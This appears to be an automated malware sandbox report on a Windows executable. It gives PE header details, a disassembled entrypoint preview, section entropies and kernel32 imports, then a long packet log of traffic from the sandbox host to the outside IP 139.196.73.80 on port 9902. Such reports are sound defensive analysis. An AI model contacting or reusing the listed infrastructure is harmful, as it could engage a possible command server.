Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	f0ea7b7844bbc5bfa9bb32efdcea957c

Entrypoint Preview

Instruction
jmp 00007F73F092C8C0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
pushfd
cld
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [esp], edi
dec eax
mov dword ptr [esp+08h], esi
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], ebx
dec esp
mov dword ptr [esp+20h], esp
dec esp
mov dword ptr [esp+28h], ebp
dec esp
mov dword ptr [esp+30h], esi
dec esp
mov dword ptr [esp+38h], edi
movups dqword ptr [esp+40h], xmm6
movups dqword ptr [esp+50h], xmm7
inc esp
movups dqword ptr [esp+60h], xmm0
inc esp
movups dqword ptr [esp+70h], xmm1
inc esp
movups dqword ptr [esp+00000080h], xmm2
inc esp
movups dqword ptr [esp+00000090h], xmm3
inc esp
movups dqword ptr [esp+000000A0h], xmm4
inc esp
movups dqword ptr [esp+000000B0h], xmm5
inc esp
movups dqword ptr [esp+000000C0h], xmm6
inc esp
movups dqword ptr [esp+000000D0h], xmm7
dec eax
sub esp, 30h
dec ecx
mov ebp, ecx
dec ecx
mov edi, eax
dec eax
mov edx, dword ptr [00100013h]
dec eax
mov edx, dword ptr [edx]
dec eax
cmp edx, 00000000h
jne 00007F73F09304CEh
dec eax
mov eax, 00000000h
jmp 00007F73F0930593h
dec eax
mov edx, dword ptr [edx]
dec eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x160000	0x490	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x161000	0x2658	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf5100	0x148	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7109a	0x71200	dede1edb6b493b0e3ede08c7f2250026	False	0.47783149171270717	data	6.18476321580781	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x73000	0x81828	0x81a00	9c827378aa5583e4b0424710e56eceeb	False	0.4274443255785921	data	5.3797712092898005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xf5000	0x6af90	0x13600	6413f940005a4b65d8af15fa60971f32	False	0.30023941532258064	data	3.932945680576623	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x160000	0x490	0x600	cf321763453d439831b34167543331cb	False	0.3352864583333333	data	3.549525152723948	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x161000	0x2658	0x2800	43f32867c7fcb8f7370430a88da0cf6e	False	0.36669921875	data	5.350055876136492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x164000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 17, 2024 07:06:56.102878094 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:56.449841976 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.450051069 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:56.450278997 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:56.790860891 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791157007 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791320086 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791337967 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791356087 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791374922 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791392088 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791407108 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791424036 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791440964 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791456938 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:56.791491985 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:56.791491985 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:56.791491985 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:56.791491985 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:56.791491985 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.115964890 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116022110 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116063118 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116121054 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116183996 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116224051 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116262913 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116298914 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116313934 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116313934 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116313934 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116313934 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116314888 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116314888 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116314888 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116338015 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116379976 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116405964 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116405964 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116416931 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116429090 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116452932 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116466999 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116491079 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116514921 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116527081 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116549015 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116565943 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116590977 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116602898 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116626978 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116641045 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116662025 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116677046 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116694927 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116760015 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116780043 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116820097 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.116842031 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.116874933 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450094938 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450122118 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450139046 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450179100 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450189114 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450205088 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450213909 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450223923 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450232029 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450242996 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450259924 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450269938 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450285912 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450304031 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450320005 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450335979 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450352907 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450367928 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450383902 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450400114 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450416088 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450432062 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450438023 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450438023 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450438976 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450448036 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450438976 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450438976 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450438976 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450438976 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450438976 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450465918 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450481892 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450498104 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450516939 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450520039 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450520039 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450520039 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450534105 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450547934 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450550079 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450568914 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450584888 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450592995 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450601101 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450617075 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450632095 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450634003 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450649977 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450650930 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450665951 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450670958 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450675964 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450692892 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450709105 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450716019 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450726986 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.450757027 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.450783014 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.771795988 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771826029 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771842957 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771859884 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771879911 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771897078 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771915913 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771934032 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771950960 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771969080 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.771984100 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772000074 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772015095 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772031069 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772047043 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772063017 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772078991 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772094965 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772123098 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772139072 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772155046 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772175074 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772175074 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772175074 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772175074 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772175074 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772175074 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772175074 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772192001 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772211075 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772231102 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772249937 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772265911 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772265911 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772265911 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772265911 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772281885 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772298098 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772304058 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772315025 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772330999 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772346973 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772358894 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772362947 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772378922 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772391081 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772396088 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772416115 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772430897 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772432089 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772448063 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772450924 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772464991 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772480965 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772496939 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772511005 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772511005 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772512913 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772531033 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772547960 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772566080 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772579908 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772589922 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772607088 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772622108 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772639036 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772651911 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772654057 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772670031 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772687912 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772690058 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772703886 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772708893 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772721052 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772737980 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772746086 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772753954 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772769928 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772778034 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772784948 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772800922 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772802114 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772818089 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772835970 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772838116 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772851944 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772867918 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772878885 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772883892 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772901058 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772901058 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772918940 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772933006 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772933960 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772950888 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772967100 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772968054 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.772984028 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.772994995 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.773000956 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773016930 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773034096 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773047924 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.773049116 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773065090 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773082018 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773098946 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.773101091 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773117065 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773132086 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.773133039 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773152113 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:57.773170948 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.773186922 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:57.773232937 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110197067 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110227108 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110243082 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110261917 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110328913 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110347033 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110363007 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110378981 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110394955 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110410929 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110428095 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110444069 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110461950 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110480070 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110495090 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110511065 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110527039 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110542059 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110558033 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110582113 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110586882 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110586882 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110586882 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110599041 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110615015 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110630035 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110645056 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110661030 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110660076 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110660076 CEST	49730	9902	192.168.2.4	139.196.73.80
Apr 17, 2024 07:06:58.110677958 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110693932 CEST	9902	49730	139.196.73.80	192.168.2.4
Apr 17, 2024 07:06:58.110709906 CEST	9902	49730	139.196.73.80	192.168.2.4
